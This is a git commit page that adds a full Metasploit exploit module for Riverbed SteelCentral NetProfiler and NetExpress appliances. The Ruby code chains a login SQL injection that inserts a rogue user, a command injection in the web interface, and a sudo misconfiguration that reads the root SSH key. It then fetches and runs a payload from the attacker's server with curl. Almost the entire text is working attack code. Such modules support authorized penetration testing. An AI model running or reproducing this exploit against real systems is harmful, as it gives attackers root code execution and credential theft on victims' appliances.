Land #7048, Riverbed SteelCentral NetProfiler and NetExpress Remote
Command Injectionbug/bundler_fix
commit
52c6daa0f2
|
@ -0,0 +1,318 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
require 'digest'
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress
|
||||
virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form
|
||||
can be exploited to add a malicious user into the application's database. An attacker can then exploit a
|
||||
command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure
|
||||
configuration of the sudoers file can be abused to escalate privileges to root.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Francesco Oddo <francesco.oddo[at]security-assessment.com>' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf' ]
|
||||
],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86_64,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7', { }]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Jun 27 2016",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The target URI', '/']),
|
||||
OptString.new('RIVERBED_USER', [true, 'Web interface user account to add', 'user']),
|
||||
OptString.new('RIVERBED_PASSWORD', [true, 'Web interface user password', 'riverbed']),
|
||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
|
||||
Opt::RPORT(443)
|
||||
],
|
||||
self.class
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
json_payload_check = "{\"username\":\"check_vulnerable%'; SELECT PG_SLEEP(2)--\", \"password\":\"pwd\"}";
|
||||
|
||||
# Verifies existence of login SQLi
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
|
||||
'ctype' => 'application/json',
|
||||
'encode_params' => false,
|
||||
'data' => json_payload_check
|
||||
})
|
||||
|
||||
if res && res.body && res.body.include?('AUTH_DISABLED_ACCOUNT')
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
print_status("Attempting log in to target appliance")
|
||||
@sessid = do_login
|
||||
|
||||
print_status("Confirming command injection vulnerability")
|
||||
test_cmd_inject
|
||||
vprint_status('Ready to execute payload on appliance')
|
||||
|
||||
@elf_sent = false
|
||||
# Generate payload
|
||||
@pl = generate_payload_exe
|
||||
|
||||
if @pl.nil?
|
||||
fail_with(Failure::BadConfig, 'Please select a valid Linux payload')
|
||||
end
|
||||
|
||||
# Start the server and use primer to trigger fetching and running of the payload
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
||||
rescue Timeout::Error
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def get_nonce
|
||||
# Function to get nonce from login page
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path,'/index.php'),
|
||||
})
|
||||
|
||||
if res && res.body && res.body.include?('nonce_')
|
||||
html = res.get_html_document
|
||||
nonce_field = html.at('input[@name="nonce"]')
|
||||
nonce = nonce_field.attributes["value"]
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Unable to get login nonce.')
|
||||
end
|
||||
|
||||
# needed as login nonce is bounded to preauth SESSID cookie
|
||||
sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
|
||||
|
||||
return [nonce, sessid_cookie_preauth]
|
||||
|
||||
end
|
||||
|
||||
def do_login
|
||||
|
||||
uname = datastore['RIVERBED_USER']
|
||||
passwd = datastore['RIVERBED_PASSWORD']
|
||||
|
||||
nonce, sessid_cookie_preauth = get_nonce
|
||||
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path,'/index.php'),
|
||||
'cookie' => "SESSID=#{sessid_cookie_preauth}",
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'encode_params' => false,
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
# Exploit login SQLi if credentials are not valid.
|
||||
if res && res.body && res.body.include?('<form name="login"')
|
||||
print_status("Invalid credentials. Creating malicious user through login SQLi")
|
||||
|
||||
create_user
|
||||
nonce, sessid_cookie_preauth = get_nonce
|
||||
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path,'/index.php'),
|
||||
'cookie' => "SESSID=#{sessid_cookie_preauth}",
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'encode_params' => false,
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
|
||||
print_status("Saving login credentials into Metasploit DB")
|
||||
report_cred(uname, passwd)
|
||||
else
|
||||
print_status("Valid login credentials provided. Successfully logged in")
|
||||
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
|
||||
print_status("Saving login credentials into Metasploit DB")
|
||||
report_cred(uname, passwd)
|
||||
end
|
||||
|
||||
return sessid_cookie
|
||||
|
||||
end
|
||||
|
||||
def report_cred(username, password)
|
||||
# Function used to save login credentials into Metasploit database
|
||||
service_data = {
|
||||
address: rhost,
|
||||
port: rport,
|
||||
service_name: ssl ? 'https' : 'http',
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
module_fullname: self.fullname,
|
||||
origin_type: :service,
|
||||
username: username,
|
||||
private_data: password,
|
||||
private_type: :password
|
||||
}.merge(service_data)
|
||||
|
||||
credential_core = create_credential(credential_data)
|
||||
|
||||
login_data = {
|
||||
core: credential_core,
|
||||
last_attempted_at: DateTime.now,
|
||||
status: Metasploit::Model::Login::Status::SUCCESSFUL
|
||||
}.merge(service_data)
|
||||
|
||||
create_credential_login(login_data)
|
||||
end
|
||||
|
||||
def create_user
|
||||
# Function exploiting login SQLi to create a malicious user
|
||||
username = datastore['RIVERBED_USER']
|
||||
password = datastore['RIVERBED_PASSWORD']
|
||||
|
||||
usr_payload = generate_sqli_payload(username)
|
||||
pwd_hash = Digest::SHA512.hexdigest(password)
|
||||
pass_payload = generate_sqli_payload(pwd_hash)
|
||||
uid = rand(999)
|
||||
|
||||
json_payload_sqli = "{\"username\":\"adduser%';INSERT INTO users (username, password, uid) VALUES ((#{usr_payload}), (#{pass_payload}), #{uid});--\", \"password\":\"pwd\"}";
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
|
||||
'ctype' => 'application/json',
|
||||
'encode_params' => false,
|
||||
'data' => json_payload_sqli
|
||||
})
|
||||
|
||||
json_payload_checkuser = "{\"username\":\"#{username}\", \"password\":\"#{password}\"}";
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
|
||||
'ctype' => 'application/json',
|
||||
'encode_params' => false,
|
||||
'data' => json_payload_checkuser
|
||||
})
|
||||
|
||||
if res && res.body && res.body.include?('session_id')
|
||||
print_status("User account successfully created, login credentials: '#{username}':'#{password}'")
|
||||
else
|
||||
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def generate_sqli_payload(input)
|
||||
# Function to generate sqli payload for user/pass in expected format
|
||||
payload = ''
|
||||
input_array = input.strip.split('')
|
||||
for index in 0..input_array.length-1
|
||||
payload = payload << 'CHR(' + input_array[index].ord.to_s << ')||'
|
||||
end
|
||||
|
||||
# Gets rid of the trailing '||' and newline
|
||||
payload = payload[0..-3]
|
||||
|
||||
return payload
|
||||
end
|
||||
|
||||
def test_cmd_inject
|
||||
post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;"
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
|
||||
'cookie' => "SESSID=#{@sessid}",
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'encode_params' => false,
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
unless res && res.body.include?('uid=')
|
||||
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def cmd_inject(cmd)
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
|
||||
'cookie' => "SESSID=#{@sessid}",
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
'encode_params' => false,
|
||||
'data' => cmd
|
||||
})
|
||||
|
||||
end
|
||||
|
||||
# Deliver payload to appliance and make it run it
|
||||
def primer
|
||||
|
||||
# Gets the autogenerated uri
|
||||
payload_uri = get_uri
|
||||
|
||||
root_ssh_key_private = rand_text_alpha_lower(8)
|
||||
binary_payload = rand_text_alpha_lower(8)
|
||||
|
||||
print_status("Privilege escalate to root and execute payload")
|
||||
|
||||
privesc_exec_cmd = "xjxfun=get_request_key&xjxr=1457064346182&xjxargs[]=Stoken; sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f /opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4- | tr -d '`' | tr -d \"'\" > /tmp/#{root_ssh_key_private}; chmod 600 /tmp/#{root_ssh_key_private}; ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i /tmp/#{root_ssh_key_private} root@localhost '/usr/bin/curl -k #{payload_uri} -o /tmp/#{binary_payload}; chmod 755 /tmp/#{binary_payload}; /tmp/#{binary_payload}'"
|
||||
|
||||
cmd_inject(privesc_exec_cmd)
|
||||
|
||||
register_file_for_cleanup("/tmp/#{root_ssh_key_private}")
|
||||
register_file_for_cleanup("/tmp/#{binary_payload}")
|
||||
|
||||
vprint_status('Finished primer hook, raising Timeout::Error manually')
|
||||
raise(Timeout::Error)
|
||||
end
|
||||
|
||||
#Handle incoming requests from the server
|
||||
def on_request_uri(cli, request)
|
||||
vprint_status("on_request_uri called: #{request.inspect}")
|
||||
print_status('Sending the payload to the server...')
|
||||
@elf_sent = true
|
||||
send_response(cli, @pl)
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue